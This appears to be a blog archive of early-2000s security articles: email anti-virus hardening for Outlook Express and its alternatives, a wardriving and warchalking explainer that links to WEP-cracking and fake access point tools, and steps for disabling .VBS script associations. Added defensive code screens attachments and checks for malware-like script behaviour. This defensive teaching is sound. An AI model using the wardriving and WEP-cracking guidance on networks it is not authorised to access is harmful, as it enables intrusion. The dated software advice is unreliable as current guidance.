This is an ‘industry’ which is showing little sign of diminishing.

In order to work, your anti-virus software needs a list of viruses
and malicious code to check against. This list has to be kept
up-to-date so the software will recognise the latest threats. There is
no point having anti-virus software that only recognizes threats
created before 2003.

All good AV software will have a ‘live update’ type feature, which
needs to be activated. This allows the anti-virus software to connect
to a web page on the Internet and download the latest details of
things to check for. Depending on the software you are using and how
often you use the Internet, you will need to set the live update
feature to automatically check at appropriate times. We recommend
doing it at least once a week, and preferably aim for at least once
a day (especially if using broadband).

If, following a live update, a virus is subsequently detected on your
computer, then take action immediately.

In order for live update to work, the AV programme has to access
the Internet. This activity may be picked up by monitoring
programmes such as firewalls, which in turn alert you. Check on a
search engine for the name of the programme causing an alert and
check whether it is related to your AV software.

There is a constant struggle between virus writers and anti-virus
software companies, though there is a lot of hype from the latter.
This is not helped by constantly changing software and operating
systems offering new opportunities and flaws that need defending.

7. Windows
Windows as the major operating system is the most targeted by virus
writers.  Within Windows, Outlook and Outlook Express are the
programmes most at risk, followed by file-sharing (P2P) programmes.

We will focus on Outlook / Outlook Express as this is one of the
commonest email programmes used but also one of the most flawed.
As a result virus writers quite often target Outlook. However, some
of what we discuss below is just as applicable to other email programmes.
They are still vulnerable to some attacks, and it may be the case
that in the future they will become more susceptible as virus authors
turn their attention to them.

Alternatives to Outlook Express
Our honest advice is to get rid of Outlook Express for another
programme. Eudora (www.eudora.com) and Pegasus (www.pmail.com) are
two programmes that are free and similar to Outlook Express,
but with fewer security issues.

Of the three, Pegasus has the strongest reputation for security,
having it built in as a concept from the beginning; however it does
have a somewhat quirky layout. Eudora has a good reputation for
security, but still has some holes in it; however if you are still
getting comfortable using computers, it is a better option when moving
away from Outlook Express as the layout is similar. They are discussed
in more depth below.

A new programme gaining ground and reputation is Thunderbird,
based on the open source Mozilla project
(www.mozilla.org/products/thunderbird/). Though still in early
release, good things are being said of it, and it is being developed
with security as a feature as opposed to an optional extra. Again,
see below for more details.

If you are changing away from OE, once you have saved all the material
you want from it, it is best to uninstall the programme from the
system, especially if it is an old version of the programme.

Outlook Express (OE)
If changing your email programme is not an option, then there are some
steps you can take in Outlook Express to minimise the effect of being
hit by a virus. A summary of these is:

Update to Outlook Express 6
(the version number will appear in the starting up pane under or
next to the words Outlook Express).

Set the security zone to “restricted” – this has the effect of
disabling active scripting (ActiveX, Java). See below for details.

Read messages in plain text, turning off the HTML format.
See below for details. This has the effect of disabling risky
scripting features, and enhancing privacy by stopping webbugs used
to track people’s activities.

Disable the address book by simply not putting contact details into
it. OE 6 has attempted to deal with some of the flaws facilitating
abuse of the address book by viruses, but this seems to only work
if OE 6 is the default email programme. This does not protect you as
such but will certainly make a difference should you ever become
infected with a virus that will attempt to infect all your contacts
and friends. See below for more details.

Set content filters to delete messages with the extensions .vbs,
.com, .bat, .scr, .exe and .pif. See below for more details. This
feature is only available with OE 6; earlier versions do not have
this, and we recommend upgrading just to get this. However, it is
possible to apply a security patch to protect earlier versions of
OE – see: http://office.microsoft.com/Downloads/2000/Out2ksec.aspx

Set OE to filter any email whose attachment has two or three
extensions.

Disable the preview pane; this feature allows some code to run
automatically and can inadvertently run viruses embedded in other
files. See below on how to do this.

Visit http://www.windowsupdate.com/ regularly to check for any
updates and patches which must be applied to keep OE secure (can be
found under Product Updates -> Critical).

Depending on the version of Outlook you are using, some of the above
should already be set by default. Others are not. It is worth
checking through the settings to ensure that all is working as it
should.

The following instructions are optimised for Outlook Express 6.
Sorry that it seems quite long, but that again is evidence of
security not being a primary concern of Microsoft when developing
its software. There may be some differences in the Outlook 5 series
but they should be recognizable, though we recommend you upgrade or
patch as much as possible.

Setting the Security Zone

Under the Tools menu, select Options.
In the window pane that now appears choose the Security tab.
You are now offered a choice of several zones, including
“Restricted Sites Zone” and “Internet Zone”. The former has less
functionality but is more secure, the two going hand in hand. We
recommend setting the “Restricted Sites Zone” as the default. In
practice we have found that people are not greatly impacted as the
average user does not need or use the greater functionality.
Other zones such as “Trusted Sites” and “Local Intranet” are not
particularly good options either as you are still trusting others to
be secure.  If the “Restricted Sites Zone” is not present, you should
still have “Internet Zone”  – select that and configure it in the
same way as we are now going to suggest you configure what is in the
“Restricted Sites Zone”. Control of what is in the
“Restricted Sites Zone” is done through Internet Explorer as follows:

Click Custom Level
In the list that appears, scroll through and disable all
options related to Java and ActiveX. This will affect some websites,
but the security gained is much more useful. Disabling JavaScript
will have a major impact on viewing websites, so is left alone.
Other features worth ensuring are disabled are:

i.     “Access data sources across domains”

ii.    “Drag and drop or copy and paste files”

iii.   “Installation of desktop items”

iv.    “Launching programs and files in an iFrame”

Effectively, almost everything in this list can be disabled.
v.   At the “software channel permissions” option, set to high safety.

Note: selecting the “high” option for the restriction level is
insufficient; Custom Level must be chosen and tailored for this to be
effective. This cross programme integration may appear useful in
theory, but falls down because the options are insufficient, in that
it is not possible to directly disable JavaScript in email messages.
To do this, we need to return to the Outlook Express option pane and
disable the ability to view HTML/JavaScript by switching to the Text
Only option. This is less pretty but far safer.

On the other hand, setting the Restricted Zone in Internet Explorer
affects both IE and OE at once, leading to better security in the
former as well.

A page with images from some of the above process may be found at

http://www.codecutters.org/outlook/

Setting the Text Only option
Still in the Options window pane, select the Read tab.
In the set of choices labelled “Reading Messages” check the box next
to “Read all messages in plain text”.
Note: if this does not appear in your version of Outlook Express you
may need to install the Internet Explorer 6 service pack 1 (IE6 – SP1).
See http://www.windowsupdate.com/ to get this.

Filtering out virus related attachments
Still in the Options window pane, go back to the Security tab.
In the set of choices labelled “Virus Protection”, click the box next
to “Do not allow attachments to be saved or opened that could
potentially be a virus”. Unfortunately this option requires settings
in Internet Explorer as well. When finished setting Outlook Express
you may need to do the following on your Windows computer:
Click Start -> Settings (or Control Panel). An alternative route in
WinXP is to use the Classic View -> View all control panel options.
Select Folder Options.
Select File Types.
This should let you see if the file extensions above
(.scr, .pif, .vbs, etc) are listed. If not, you will need to add
them. Double-click on each of the extensions for the ‘dangerous’ set
we’ve noted above and ensure that the box called “Confirm open after
download” is checked. This will stop Windows automatically running
files with these extensions, which could otherwise automatically
open files and programmes with viruses.
Also in the “Virus Protection” set, check the box labelled
“Warn me when other applications try to send emails as me.” Such a
warning will alert you to the possibility that a virus has slipped
through and is active on your computer. However, if you are using
other email programmes as well as OE, then conflicts may arise.
If the above options are not available, as is generally the case in
Outlook versions earlier than 6, look for an option in OE to set Rules
for incoming emails, and use this feature to filter out attachments
with the extensions warned against above. An advantage of doing it
this way is that virus infected messages are immediately trashed
without you having to bother with them.
Note: When a file attachment in Outlook Express has been blocked, the
following message will appear in the message alert bar for the email
message: “Outlook Express removed access to the following unsafe
attachments in your email: file.xxx”, where file.xxx is the name of
the file with the prohibited extension.

Older Outlook versions may have an Attachment Security option –
set this to high.

Protecting others
In the Options windowpane select Send.
In the “Mail Sending Format” box select “Plain Text”.
Uncheck the box labelled “Automatically put people I reply to in
my Address book”.
Open up the address book and delete all entries.
Click OK to close the Option windowpane and save the changes
you have made.

Turning off the Preview Pane
Go to View -> Layout -> Preview Pane.
Deactivate the view preview pane option.
Restart Outlook to enable these changes.

Outlook Express hides by default the extension of a file –
this is the three letters at the end of a filename which lets Windows
know what type of file it is and thus what programme it works with.
Some virus writers exploit this by giving the virus an extra
extension to lull users into believing it is safe, for example
file.pdf.scr. What appears to the user is just file.pdf, dropping
the .scr which would indicate that this is really a virus. This can
be turned off.
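
The attachment rules from section 5 and from the Outlook Express steps above (blocked extensions, an extra extension such as file.pdf.scr, password-protected zips, and zips that have been zipped up several times) can be expressed as one screening routine. This is an added example, not part of the original guide; the function names, the nesting limit, the size cap and the sample message are assumptions constructed for illustration.

```python
import io
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage

# Extensions the guide says to filter on.
BLOCKED_EXTS = {".vbs", ".com", ".bat", ".scr", ".exe", ".pif"}
MAX_ZIP_DEPTH = 2              # assumption: levels of nesting we will unpack
MAX_MEMBER_BYTES = 5 * 2**20   # assumption: never inflate a member over 5 MiB


def check_filename(name):
    """Return the reasons a filename should be blocked (empty list = allowed)."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    # Windows ignores trailing dots and spaces, so "x.exe." still runs as .exe.
    parts = base.lower().rstrip(". ").split(".")
    exts = ["." + p for p in parts[1:]]
    reasons = []
    if exts and exts[-1] in BLOCKED_EXTS:
        reasons.append("blocked extension " + exts[-1])
        if len(exts) > 1:
            reasons.append("extra extension %s disguises the real type" % exts[-2])
    return reasons


def inspect_zip(data, depth=1):
    """List problems found inside a zip without writing anything to disk."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a readable zip archive"]
    reasons = []
    with zf:
        for info in zf.infolist():
            if info.flag_bits & 0x1:  # bit 0 of the general-purpose flags: encrypted
                reasons.append(info.filename + ": password-protected, cannot be scanned")
                continue
            reasons += [info.filename + ": " + r for r in check_filename(info.filename)]
            if not info.filename.lower().endswith(".zip"):
                continue
            if depth >= MAX_ZIP_DEPTH:
                reasons.append(info.filename + ": nested more than %d levels deep" % MAX_ZIP_DEPTH)
            elif info.file_size > MAX_MEMBER_BYTES:
                reasons.append(info.filename + ": nested archive too large to inspect")
            else:
                reasons += inspect_zip(zf.read(info), depth + 1)
    return reasons


def screen_message(raw_bytes):
    """Map each suspicious attachment name to the reasons it was flagged."""
    msg = message_from_bytes(raw_bytes, policy=policy.default)
    findings = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        reasons = check_filename(name)
        if name.lower().endswith(".zip"):
            reasons += inspect_zip(part.get_payload(decode=True) or b"")
        if reasons:
            findings[name] = reasons
    return findings


def make_zip(members):
    """Build an in-memory zip from {name: bytes}; used only for the sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample():
    """Constructed message; every attachment is harmless placeholder bytes."""
    level3 = make_zip({"c.txt": b"placeholder"})
    level2 = make_zip({"b.zip": level3})
    docs = make_zip({"invoice.pdf.exe": b"placeholder", "a.zip": level2})
    msg = EmailMessage()
    msg["From"] = "friend@example.com"
    msg["To"] = "you@example.com"
    msg["Subject"] = "constructed sample"
    msg.set_content("See attached.")
    for name, data in [("holiday.jpg.scr", b"placeholder"),
                       ("notes.txt", b"placeholder"),
                       ("docs.zip", docs)]:
        msg.add_attachment(data, maintype="application",
                           subtype="octet-stream", filename=name)
    return msg.as_bytes()


if __name__ == "__main__":
    for name, reasons in screen_message(build_sample()).items():
        print(name)
        for reason in reasons:
            print("   ", reason)
```

Run against the constructed message, it flags holiday.jpg.scr and docs.zip and lets notes.txt through.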

Eudora
Available from Qualcomm at http://www.eudora.com/,
it comes in a number of varieties, some free and some not.
Though it does not have as many holes as Outlook Express,
it does have a few. Unfortunately, Qualcomm is not
forthcoming on what can be done about them.

Rather than duplicate material elsewhere, we refer you to the
following website from About.com which discusses solutions for
securing Eudora: http://antivirus.about.com/library/bleudora.htm

We strongly recommend that you switch to text mode only and avoid
options allowing attachments to be previewed/viewed inline.

The other thing we would add is that Eudora’s filters can be found under Window; though to make a new filter follow special -> make filter… For more information on setting filters in Eudora see http://www.eudora.com/techsupport/tutorials/index.html.
This will allow you to set rules which will block unwanted emails.

Pegasus (Pmail)
Available from http://www.pmail.com, Pegasus has many features that make it
a preferred option over Eudora and Outlook Express, though its layout
is not as generic as the other two. It is free to use, though you
have to pay for the manuals. Security has been built in from the
start and it shows.

In particular, it has its own way of dealing with HTML emails
which means a number of virus types will not work on it, a feature
not found in many of the more popular software programmes.
JavaScript and ActiveX are not handled, so they cannot open holes.
It may not be as pretty, but it is far more secure, and by not
downloading graphics from the Internet, it helps increase your
privacy as well.

The handling of attachments has been greatly restricted, making it
harder for users to run them (though this is not the case for .doc
files). Nevertheless, the rule of not downloading and/or running
attachments holds, as it will do for all email programmes. The rule
creation ability in Pegasus is strong and can be found under
Tools -> Options -> Viewer Controls.

Thunderbird
Can be downloaded for free for Windows, Linux & Mac OS X at
http://www.mozilla.org/products/thunderbird. Based on the old Netscape
browsers, but greatly updated as part of an open source community
project, Mozilla and its associated email software, Thunderbird, are
gaining a strong reputation for stability and security as well as
being feature rich.

From the point of view of viruses, it has a number of salient
features:

The ability to write very strong rules and filters to block spam and
associated viruses.
JavaScript is turned off by default
It is not possible for viruses to run automatically
(though they can still be activated if saved and run separately),
even if you preview attachments.
For more information visit http://texturizer.net/thunderbird/faq.html

Though not entirely fully fledged at the time of writing, with some
important features not yet working or implemented, we do anticipate
that Thunderbird will develop into a highly recommended piece of
software in the not too distant future.

8. Linux & Mac
A. Linux
Linux and other Unix type operating systems can get viruses,
but it is hard work to infect a machine and requires a series of
actions on the part of the user. There are other advantages to Linux
that, though not protection in themselves, do give rise to barriers
to the spread of viruses:

The culture of Linux makes it a more secure system in general –
though it is still important to patch regularly.
The variety of email programmes and distributions means that no
single programme is dominant in the same way that Outlook Express is
for Windows. The default actions of most of the email programmes are
also generally set with security in mind, as opposed to making
usability the overriding issue.
Both these act as deterrents to virus writers as it will currently
require significant effort to write enough possible variation into a
virus that would be able to propagate any distance into the internet.

Whatever the distribution and email programme you use for Linux, it
is still important to check some basic settings are in place:

i.             Scripts are not run automatically

ii.            Ability to automatically open attachments in
email programmes is switched off, or at least you are
given the option with a warning box if you want to run
it first.

iii.           Settings allow you to prevent your email programme
from downloading images/scripts/etc from remote
servers

iv.            Set the /home directory as noexec.

Some Linux people argue that the above are mostly theoretical;
however as Linux is growing and changing as well, it is good to be
prepared for potential future threats.
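
Item iv can be verified rather than assumed by reading the mount table. The following added example (not part of the original guide) parses /proc/mounts-style text and reports whether the filesystem holding a given path carries the noexec option; the function names and the sample mount table are constructed for illustration.

```python
import posixpath
import re


def parse_mounts(text):
    """Parse /proc/mounts-style text into (mount_point, options) pairs."""
    mounts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0].startswith("#"):
            continue
        # The kernel writes space, tab, newline and backslash as \040 etc.
        mount_point = re.sub(r"\\([0-7]{3})",
                             lambda m: chr(int(m.group(1), 8)), fields[1])
        mounts.append((mount_point, set(fields[3].split(","))))
    return mounts


def covering_mount(path, mounts):
    """Return the (mount_point, options) entry that actually holds path."""
    path = posixpath.normpath(path)
    best = None
    for mount_point, options in mounts:
        mp = mount_point.rstrip("/") or "/"
        # Compare whole path components so /homework is not matched by /home.
        inside = path == mp or mp == "/" or path.startswith(mp + "/")
        # ">=" lets a later mount on the same point override an earlier one.
        if inside and (best is None or len(mp) >= len(best[0])):
            best = (mp, options)
    return best


def audit_noexec(path, mounts_text):
    """Report which mount holds path and whether it is mounted noexec."""
    entry = covering_mount(path, parse_mounts(mounts_text))
    if entry is None:
        return None
    mount_point, options = entry
    return {
        "path": path,
        "mount_point": mount_point,
        "noexec": "noexec" in options,
        # If /home is not its own filesystem, noexec cannot be set for it alone.
        "separate_filesystem": mount_point != "/",
    }


# Constructed sample in the format of /proc/mounts.
SAMPLE_MOUNTS = r"""
/dev/sda1 / ext4 rw,relatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda3 /home ext4 rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0
/dev/sdb1 /media/usb\040stick vfat rw,noexec 0 0
"""

if __name__ == "__main__":
    for p in ["/home/alice/Downloads/tool", "/tmp/tool", "/homework/tool"]:
        print(audit_noexec(p, SAMPLE_MOUNTS))
```

noexec only blocks direct execution of files on that filesystem; a saved script can still be run by passing it to an interpreter (for example sh script.sh), so this setting complements the other three items rather than replacing them.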

Another advantage of Linux is that it is harder to run executable
files. Currently to get a malicious script or programme from an
email or website, it requires the user to do the following:

Save the script/executable.
Unpack it, if it comes as a zip file.
Open up a terminal and change the permissions on the
script/executable (chmod u+x / chmod 700) so that it can be run.
Alternatively, open up a file manager, right click it and change
permissions.
Run it from the command line; or if using a file manager, click the
script/programme.

Of course, social engineering may be able to convince the user to
do this, but even then there are obstacles to the spread of the virus,
depending on how root access and the /home directory have been set
up and permissions set for them. Essentially, the user will do little
more than damage their own machine.

At the moment it is far easier to write viruses for
Windows/Outlook Express. Note, with Linux we have focused only on
email-borne viruses on stand-alone computers, as opposed to other
transmission methods. Nor have we looked at worms or network-borne
viruses. However, these are issues more appropriate to system/network
administrators as opposed to average users.

B. Mac
Though there are viruses for the Apple Macintosh operating systems,
they are generally overlooked by the vast majority of virus writers,
making it quite a secure system from this perspective. As a result
there is very little to say on this front. This does not mean that
there are no holes in Macs, but instances of exploits are few and
active exploits even fewer.

9. How AV software works
This section takes a quick look at the technical side. Anti-virus
software works by constantly scanning memory, files and programmes as
you use them, looking for malicious code.

There are several different ways this can happen:

a) Scanning everything on start up
b) Scanning specific programmes, in particular Internet related ones.
c) Scanning external drives such as floppy disks, USB storage media and CDs
d) Scanning particular files/drives when you ask it to.

Categories a) – c) are referred to as “on-access” as they are
normally triggered by certain actions taking place in the system and
only indirectly through the user’s actions. Category d) is known as
“on-demand” as the user calls the AV software directly.

In many cases the software will do all of this. The downside is that
this uses up the computer system’s resources. Depending on the
software and the computer, including the operating system, this can
cause the user to find their computer acting very slowly. Another
factor affecting speed is the number of viruses that must be defended
against, especially on Windows machines.

This is a security concern in itself. Though it should be emphasised
that security does require time, taking too much time will frustrate
users and they are more likely to disable it, leading to a bigger
security risk.

When it comes to detecting viruses, there are two principal
methods: signatures and heuristics.

A virus signature is a section of code from the virus which clearly
identifies it and so can be used to declare the whole bit of code as
a virus. Anti-virus software companies investigate each virus as it
comes along and their engineers will determine what they think is the
best way for detecting that particular virus; they will then add this
information to their database of viruses which can be accessed across
the Internet by their anti-virus programmes.

In some cases, different viruses are actually variations on each
other (there are some tools available which allow people to write
their own viruses without actually knowing how to code them) and this
allows a virus signature to flag a whole family of viruses.
Pretty much all AV software will use this technique.

The heuristic approach is more proactive. Rather than watching for
viruses, it is a method of judging in advance whether the actions of
a piece of code could be malicious if activated. The advantage is
that it increases the chance of catching the latest viruses quicker
than depending on waiting for the latest live update being detected
and installed.

This approach still needs updates, as the behaviours that need to be
watched out for change as new flaws which can be exploited are
discovered in various software. This approach can be quite intensive
on memory and CPU, depending on the extent to which it is developed,
so may not be incorporated in all its forms in all anti-virus software.
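
The two detection methods described above can be put side by side in a few lines. This is an added illustration, not how any particular AV product is implemented: the signature names, byte patterns, heuristic rules, weights and threshold are all invented, and the samples are constructed, inert strings.

```python
import re

# Constructed signatures: invented byte patterns standing in for the code
# fragments a vendor would extract from real samples and ship in an update.
SIGNATURES = {
    "Demo.A": re.compile(rb"DEMO-PAYLOAD-\x01\x02\x03"),
    # A pattern with a bounded wildcard gap flags every variant from one kit.
    "DemoKit.family": re.compile(rb"KITv[0-9]\.[0-9].{0,16}?--spread--", re.S),
}

# Constructed heuristic rules for script text: (pattern, weight, behaviour).
HEURISTICS = [
    (re.compile(r'CreateObject\(\s*"Outlook\.Application"', re.I), 3,
     "automates the mail client"),
    (re.compile(r"AddressLists|AddressEntries", re.I), 3, "reads the address book"),
    (re.compile(r"Attachments\.Add", re.I), 2, "attaches a file to outgoing mail"),
    (re.compile(r"WScript\.ScriptFullName", re.I), 2, "refers to its own file"),
    (re.compile(r"RegWrite", re.I), 1, "writes to the registry"),
]
THRESHOLD = 6  # assumption: total weight at which a file is reported


def signature_scan(data):
    """Names of all known signatures found in the bytes."""
    return sorted(name for name, pat in SIGNATURES.items() if pat.search(data))


def heuristic_score(text):
    """Total weight and list of suspicious behaviours referenced in the text."""
    hits = [(w, why) for pat, w, why in HEURISTICS if pat.search(text)]
    return sum(w for w, _ in hits), [why for _, why in hits]


def scan(data):
    """Return (verdict, details): signatures first, heuristics as fallback."""
    names = signature_scan(data)
    if names:
        return "signature", names
    score, reasons = heuristic_score(data.decode("latin-1"))
    if score >= THRESHOLD:
        return "heuristic", reasons
    return "clean", []


# Constructed, inert samples (token lists, not working programs).
SAMPLES = {
    "known": b"header DEMO-PAYLOAD-\x01\x02\x03 trailer",
    # A single changed byte is enough to slip past an exact signature.
    "one_byte_changed": b"header DEMO-PAYLOAD-\x01\x02\x04 trailer",
    "kit_variant_1": b"KITv1.0 abc --spread--",
    "kit_variant_2": b"KITv2.3 zzzzzzzz --spread--",
    # No signature exists for this one; only its behaviour gives it away.
    "unknown_mailer": b'tokens: CreateObject("Outlook.Application") AddressLists '
                      b"Attachments.Add WScript.ScriptFullName",
    # One low-weight behaviour alone stays under the threshold.
    "admin_script": b"tokens: RegWrite",
}

if __name__ == "__main__":
    for label, data in SAMPLES.items():
        print(label, scan(data))
```

The one_byte_changed sample shows why signature lists need constant updates, and the admin_script sample shows why heuristic weights and thresholds have to be tuned to avoid flagging legitimate scripts.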

Viruses continue to change and adapt and there is no sign of them
abating. Virus writers are matching the defensive techniques being
thrown up against them, and finding new ways. Recent advances
include encryption and polymorphic coding techniques. Virus authors
are also increasingly looking to deal directly with flaws in the
anti-virus software and email filtering tools, exploiting them to
get the emails past them and in front of the users who think that
they are fully protected against viruses. [6]

Also changing are the uses to which viruses are put. Initially it
was direct damage to infected files and computers. Currently, they
are used for attacking other computers in Denial of Service attacks
and for putting backdoors into computers to give control of them to
others. Some viruses piggyback on top of others, and inventive
methods of spreading continue to be discovered. As other devices
become more sophisticated, such as hand-helds and phones, they too
will become targets for virus writers. However, the basic advice
remains the same: don’t trust attachments, protect and update.

10. Resources
[0] Further reading:

http://www.datafellows.com/virus-info/virus-news

http://vil.nai.com/villib/alpha.asp

[2] A guide to how the Sophos AV product works is at:

http://www.ciphertrust.com/insider/november2002/sav-overview.htm

[3] Critiques of the Anti-Virus software industry:

http://www.theregister.co.uk/content/55/35579.html

http://www.attrition.org/security/rant/av-spammers.html

A number of writers have pointed out that the various cost estimates
of ‘damage’ done by viruses are at best guesswork, and the figures
are released by anti-virus software companies drumming up publicity.

[4] Viruses as a security threat:

http://www.theregister.co.uk/2004/04/07/japanese_keystone_cops/

[5] Statistics on virus infection in UK Businesses:

http://www.theregister.co.uk/content/56/35950.html

[6] Outlook filters exploited to get around content filtering:

http://www.theregister.co.uk/content/56/29137.html

[7] Articles on securing Outlook & Outlook Express

Using Virus Protection Features in Outlook Express 6:

http://support.microsoft.com/?kbid=291387

Patch for OE 5.01:

http://support.microsoft.com/default.aspx?kbid=267580&product=oex

Wireless Scanning – Wardriving Warchalking

March 3, 2007

Wireless Scanning – Wardriving / Warchalking
By Danny “Dr.T” – admin@ebcvg.com

In my previous article about wireless security and hacking, I introduced common security threats in WLANs and ways that wireless hackers use them to break into a wireless network. Before a wireless hacker breaks into a WLAN, he/she must identify a suitable open network to launch her/his attack. This article explains what the common methods for wireless scanning are, and how to get protected against them as well.

What is wireless scanning?

Wireless scanning is a method to find an available wireless network access point. It allows you to identify wireless networks through the use of a WNIC (wireless network interface card) running in promiscuous mode and software that will probe for access points. Once an open wireless access point is found, the wardriver usually maps it, so at the end he would have a map of access points with their properties (SSID, WEP, MAC etc.). Whenever the attacker wants to return into the network, he/she usually logs packets for later analysis, or to run them through a WEP key cracker when a weak key is being used.

There are many different types of wireless scanning. The best known and most used scanning method is Wardriving; next comes Warchalking. There are many other methods such as Warstrolling, Warflying etc., however this article deals with Wardriving and Warchalking only.

Why “War”?

The term “war”, which is used in Wardriving, Warchalking etc., was taken from the old days of WarDialing. WarDialing, the hacking practice of phoning up every extension of a phone network until the number associated with a modem is hit upon, has been replaced by WarDriving with the introduction of wireless LANs.

WarDriving – Let’s take a drive…

Wardriving is the first and best-known method used to find available (meaning unsecured) wireless networks. It is usually done with a mobile device such as a laptop or iPaq. Wardriving scanning is accomplished in an easy way: the attacker takes the device with him/her into a car, and detects networks (NetStumbler for Windows, BSD-AirTools for BSD, and airsnort for Linux). Once an open access point is detected, the attacker maps it, explores, or stumbles into a pipe to the internet.

The equipment necessary to WarDrive is: A wireless network interface card (PCMCIA), a device capable of locating itself on a map (GPS, not always necessary), a laptop or any other mobile device, Linux Red Hat or Debian (Windows is not recommended), Wireless tools (WEPCrack, AirSnort etc.).

The equipment is all off the shelf and pretty inexpensive.

WarChalking – The hobo language

“Now a new “language” is developing, WarChalking. The idea is based on the “hobo symbols” and is there to tell persons on the street where there is an open wireless network node, and what the settings are. It may look like incomprehensible squiggles, and most people would walk past thinking it is odd graffiti, but it conveys a lot of info that is understood by the hackers. Furthermore, it is now being adopted by those that are sharing networks voluntarily as a way to give the info out to the community.” – Zig

WarChalking was conceived by a group of friends in June 2002, and published by Matt Jones.

WarChalking is simply drawing a chalk symbol on a wall or pavement to indicate the presence of a wireless network, so that others can easily notice it and the details about it. WarChalking is the modern version of the hobo sign language, which was used by low-tech kings of the road to alert each other to shelter, food and potential trouble. The chalk symbols are nothing more than a visual cue to a wireless network.

The following are the WarChalking symbols:

Key             Symbol

Open Node       SSID
                )(
                Bandwidth

Closed Node     SSID
                ()

WEP Node        SSID   Access Contact
                ( W )
                Bandwidth

Example for a WarChalking symbol:

Retina
)(
1.5

This symbol indicates an open node with SSID “Retina” and bandwidth equal to 1.5MBps.

With the use of these symbols, wardrivers can learn a lot about the node, and whether it is a worthwhile network. Anyone initiated in the ways of WarChalking will recognize what it means, and get online.

Securing WLANs

Securing a wireless network is much simpler than securing a wired network. Building a secure wireless network can be done within a few steps. So, you ask yourself, “why then is it easy to break into a wireless network?” The answer is very simple. Whenever a company wants to connect their employees wirelessly into the company network, the administrators often forget to change the default settings of a router, firewall or access point, to enable WEP, and more.

Furthermore, far too many system administrators forget that the wireless network extends beyond the walls of a building. There may be security guards at the door, and firewalls on the fixed cable network, but the wireless back door is wide open.

Wireless network security issues are not discussed in this article. WLAN security issues were discussed in my previous article, “Wireless Security & Hacking”.

Links & Sources

http://www.wifimaps.com – Map server listing wireless access points.

http://www.kraftvoll.at/software/index.shtml – GPS driving software for Linux.

http://www.kismetwireless.net – Console-based wireless sniffer. It supports GPS and has a lot of features.

http://airsnort.shmoo.com – Wireless GUI sniffer for breaking WEP keys.

ftp.cs.pdx.edu/pub/mobile – FreeBSD WScan

http://www.blackbeltjones.com/warchalking/warchalking0_9.pdf – WarChalking Symbols

http://wepcrack.sourceforge.net – WEPCrack – Linux

http://www.blackalchemy.to/Projects/fakeap/fake-ap.html – Fake AP – Linux

http://prismstumbler.sourceforge.net/ – PrismStumbler – Linux

http://www.bastard.net/~kos/wifi/ – SSID Sniff – Linux

http://www.techm.com/font2.html – Hobo Symbol Type Font

If you have any questions, suggestions, ideas or comments regarding this article, feel free to contact me at admin@ebcvg.com, or at danny@any-mail.co.uk.

Copyright © Sep 2002 Danny “Dr.T”. All rights reserved.
http://www.ebcvg.com / http://danny.at.box.sk

Windows Scripting Host – disabling VBS association

March 3, 2007

Windows Scripting Host – disabling .VBS association

Windows Scripting Host (WSH) is a part of some of Microsoft’s 32-bit operating systems, or is installed when certain Microsoft programs are installed. WSH may be used to run Visual Basic Scripts (VBS) to automate actions that are performed frequently, and can thus be a useful tool. However, WSH is also used by some virus authors to perform malicious actions on computers.

For example, the infamous LoveLetter virus utilizes WSH. As is often the situation, the security-aware person has to choose between enhanced functionality and higher security. With the havoc caused by LoveLetter in mind, security-aware organizations may want to disable the association between VBS and WSH on their computers. Then Visual Basic Scripts will not run automatically when clicked.

Below are instructions about how to disable the association between .VBS and Windows Scripting Host for the operating system that you use.

WSH is installed if:

- You install Internet Explorer version 5
- You download WSH from a Microsoft site

How to disable the .VBS file association to WSH:

1. Log in as an administrator
2. On the Desktop, or in Windows Explorer, right-click the My Computer icon.
3. Select the menu choice Open.
4. In the My Computer window, open the View menu and select Options….
5. Open the File Types tab.
6. Scroll and look for VBScript Script File in the list of different file types (alphabetically ordered).
7. Click the Remove button.
8. Click Yes if you are asked for confirmation.

NOTE: If this file type is not in the list, .VBS files are not associated with WSH, and your computer is safe.
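One way to check the result of the steps above from PowerShell, as an added example that is not part of the original article: it reads the file-type association from the registry and reports whether opening such a file would start wscript.exe or cscript.exe. The function names and every extension other than .vbs are assumptions added for illustration.

```powershell
# Added example (not from the original article): report which script file
# extensions are still associated with Windows Script Host (WSH).
# Assumption: the extensions other than .vbs are included for illustration.
$ScriptExtensions = '.vbs', '.vbe', '.wsf', '.wsh', '.js', '.jse'

function Get-DefaultValue {
    # Returns the unnamed (default) value of a registry key,
    # or $null when the key or the value does not exist.
    param([Parameter(Mandatory)][string]$KeyPath)

    if (-not (Test-Path -LiteralPath $KeyPath)) { return $null }
    return (Get-Item -LiteralPath $KeyPath).GetValue('')
}

function Get-WshAssociation {
    param([string[]]$Extension = $ScriptExtensions)

    foreach ($ext in $Extension) {
        # On newer Windows versions a per-user choice made in Explorer
        # takes precedence over the machine-wide association.
        $userChoiceKey = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\$ext\UserChoice"
        $fileType = $null
        if (Test-Path -LiteralPath $userChoiceKey) {
            $fileType = (Get-Item -LiteralPath $userChoiceKey).GetValue('ProgId')
        }

        # Otherwise HKCR\<ext> names the file type, e.g. VBSFile for .vbs.
        if (-not $fileType) {
            $fileType = Get-DefaultValue "Registry::HKEY_CLASSES_ROOT\$ext"
        }

        $command = $null
        if ($fileType) {
            # The default value of ...\Shell names the default verb;
            # when it is empty, Windows falls back to "open".
            $shellKey = "Registry::HKEY_CLASSES_ROOT\$fileType\Shell"
            $verb = Get-DefaultValue $shellKey
            if (-not $verb) { $verb = 'Open' }
            $verb = ($verb -split ',')[0].Trim()
            $command = Get-DefaultValue "$shellKey\$verb\Command"
        }

        [pscustomobject]@{
            Extension   = $ext
            FileType    = $fileType
            OpenCommand = $command
            # True when the default action hands the file to a WSH host.
            RunsInWsh   = [bool]($command -match '\b[wc]script\.exe\b')
        }
    }
}

Get-WshAssociation | Format-Table -AutoSize -Wrap
```

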